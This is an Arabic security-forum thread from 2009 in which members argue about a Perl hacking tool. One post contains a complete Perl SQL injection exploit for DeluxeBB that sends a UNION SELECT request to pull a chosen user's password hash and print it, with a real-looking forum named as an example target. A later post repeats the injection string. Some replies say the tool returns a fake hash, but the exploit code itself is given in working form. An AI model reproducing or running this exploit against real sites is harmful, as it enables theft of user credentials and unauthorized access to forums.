بحث متقدم | التسجيل
الويب العربي
  تسجيل دخول
 
   
   

  ملاحظة
الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.




الموقع متاح للإطلاع والقراءة فقط، المشاركة والمواضيع الجديدة غير متاحة حالياً لحين تطوير الموقع.

عـودة للخلف   الويب العربي المركز التعليمي المجاني أمن المعلومات

أمن المعلومات مقالات, أخبار, مواضيع حول أمن المعلومات, وحماية أنظمة التشغيل, الشبكات, المواقع, البيانات السرية.

موضوع مغلق اضف موضوع جديد
 
خيارات الموضوع طريقة العرض
  #1  
قديم 01-08-2009, 03:54 PM
كافي عذاب كافي عذاب غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: هكركوز الكويت
مشاركة: 345
مستوى تقييم العضوية: 19
كافي عذاب is on a distinguished road
وسام الويب البرونزي 
عدد الأوسمة: 1 (المزيد ...)
Awt15 الخطر تسرب < ActivePerl

من غير مقدمات : في هذا الموضوع ينتهي كل شئ على الانترنت - وانتظروا التجربـ بالتصوير راح أطربقها



ونبي من عنده خبره واسعه في البرمجه في التصدي باخذ الهاش !!!


ما ابي اوضح اكثر من كذا خوفا من المخربين فقط



الخبره أجنبيه والعبه عربية


نبي الكل يهتم بالموضوع والنقاش حولهـ






التوقيع
KuwaiT G3 101
AlGme3.coM
  #2  
قديم 02-08-2009, 12:14 AM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

.... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية

ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز

يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه

لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل

بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات

تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5

ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته

فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها

شكراً لك

تشآآآو






التوقيع
كنتُ هنا يوماً ما ...
  #3  
قديم 05-08-2009, 05:23 PM
كافي عذاب كافي عذاب غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: هكركوز الكويت
مشاركة: 345
مستوى تقييم العضوية: 19
كافي عذاب is on a distinguished road
وسام الويب البرونزي 
عدد الأوسمة: 1 (المزيد ...)
الافتراضي

إقتباس:

اقتباس من مشاركة الصريح جداً   مشاهدة المشاركة

   .... الله يهديك سويت فيها فلم وخبرة أجنبية ولعبة أمريكية مدري عربية

ActivePerl هذا برنامج مترجم " دعم " البيرل على الويندوز

يستخدم في ترجمة برامج البيرل و تشغيلها على الويندوز , طبعاً كنظام مثل الويندوز فـ ما نحتاجه

لكن الهكر يستخدمونه لترجمة أدوات الاختراق و الاكسبلويتات المكتوبة بلغة البيرل

بالنسبة لـ الأداة المكتوبة بلغة البيرل اللي طاحت بيدك هذي أداة قديمة من قبل 3 سنوات

تنفذ امر وتحط رابط المنتدى او اي سكريبت ويعطيك الـHash أو الباس المشفر بتشفير md5

ولكنه لا يعطيك هذا فعلاً , مجرد هاش مزور لا أعلم طريقة تكوينه لأني ما فكيت الملف وقريته

فما فيه خطر .. وما يحتاج الضجة اللي انت مسويها

شكراً لك

تشآآآو


كفيت ووفيت في توضيحك


بس قلنا
الخبره أجنبيه والعبه عربية

خلنا من الثغره : الموجوده او غيرها من ما طرح بمثل اللى عندي

#!/usr/bin/perl
use IO::Socket;

print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
################################################## ####
};

if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid

هنا يتغير اسم امنتدى المصاب وكسر الادمن فقط perl dbbxpl.pl
www.theorangebelt.org/forums /1

};
}

$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";


print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";


كوده نبدله : بثغره او خطئ باي شئ مصاب به الموقع مو السكربت

ورفعه بالكود او امر يختص به في التنفيذ

ابيك تفسرها لي : اذا كان عندك فكره عامه بالبرمجة

الموجود ثغره التعليمات بالوردي

؟؟؟
البرنامج عندي من غير تثبيت !! تشغيل الامر باسم Installer
بيس
والبرامج الحديثه شرايك بها بنفس البرنامج






التوقيع
KuwaiT G3 101
AlGme3.coM
  #4  
قديم 06-08-2009, 02:50 AM
الصريح جداً الصريح جداً غير متصل
عضو
 
تاريخ التسجيل: May 2006
المدينة: جـ JeDDaH ـدة
مشاركة: 2,933
مستوى تقييم العضوية: 0
الصريح جداً is on a distinguished road
وسام الويب الذهبي وسام الويب الفضي وسام الويب البرونزي 
عدد الأوسمة: 3 (المزيد ...)
الافتراضي

هذا الملف اللي نزلته عبارة عن ثغرة Sql Injection بغض النظر عن كونها تنفذ عبر البيرل

ولا يدوي , ما يفــرق !

والثغرة هذي في نسخة قديمة ..... ما فهمت وش تقصد بآخر كلامك







التوقيع
كنتُ هنا يوماً ما ...
  #5  
قديم 06-08-2009, 11:39 AM
loverdo loverdo غير متصل
عضو
 
تاريخ التسجيل: Apr 2009
مشاركة: 38
مستوى تقييم العضوية: 0
loverdo is on a distinguished road
الافتراضي

vbulletin Remote SQL Injection Exploit
الحرب على الانترنيت بدات



$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0, pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0+FROM% ملف القالب والرابط لثغره20deluxebb_users%20WHERE%20(uid='".$user ;







  #6  
قديم 23-08-2009, 08:48 PM
runvirus runvirus غير متصل
عضو
 
تاريخ التسجيل: May 2006
مشاركة: 27
مستوى تقييم العضوية: 0
runvirus is on a distinguished road
الافتراضي رد

هذه خدعه اخي سبق ونزلت شرح خدعة هذه الثغره فاهي تقوم بعمل HASH وهمي تخدع المخترق انه تمكن من الحصول علي باسورد الموقع وطبعا script kiddz مش فاهم وفرحان انه حصل علي باسورد الموقع :]





موضوع مغلق




قوانين المشاركة
لا يمكنك إضافة موضوع جديد
لا يمكنك الرد على المواضيع
لا يمكنك إضافة مرفقات
لا يمكنك تعديل مشاركاتك

كود vB متاح
كود [IMG] متاح
كود HTML مغلق
إنتقل إلى

مواضيع مشابهة
الموضوع الكاتب القسم مشاركة آخر مشاركة
قلت مشاكل الاختراقات الحمدلله بس الخطر من الاستضافه كافي عذاب أمن المعلومات 4 12-01-2009 09:51 PM
الخطر القادم للديجي شات قافلة الصبر تطويرالمواقع 3 23-08-2006 11:20 PM


جميع الأوقات بتوقيت مكة المكرمة. الساعة الآن » 02:10 AM.

Powered by vBulletin
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.


 
 »  خدمات البرمجة   »  رئيسية الدليل
  »  خدمات التصميم   »  الأمن والحماية
  »  الدعاية والتسويق
  »  الدعم والتطوير
  »  الشركات الرسمية
  »  حجز دومينات
  »  خدمات الإستضافة
 
 
  »  مكتبة الإستايلات   »  رئيسية المكتبة
  »  أكواد برمجية   »  أدوات الويب ماسترز
  »  مكتبة الهاكات   »  أدوات المصممين
  »  سكربتات متنوعة
  »  مجلات إلكترونية
  »  بلوكات متنوعة
  »  ثيمات مختلفة
 
 

صحيفة متخصصة في متابعة أخبار وجديد الإنترنت العربي
والحوارات الصحفية ومعلومات تقنية متنوعة .

   
 
 

للتواصل مع فريق عمل الويب العربي
يمكنك ذالك من خلال مركز الدعم والمساندة.

 الدعم الفني |  اعتماد العضويات |  قوانين الإنتساب |  إتفاقية الإستخدام |  أهداف الويب العربي |  دليل الشركات |  مكتبة الويب |  صحيفة الويب العربي |  الرئيسية